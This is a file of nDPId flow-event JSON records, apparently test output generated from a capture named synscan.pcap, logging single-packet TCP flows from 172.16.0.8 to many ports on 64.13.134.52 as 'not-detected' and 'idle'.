+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
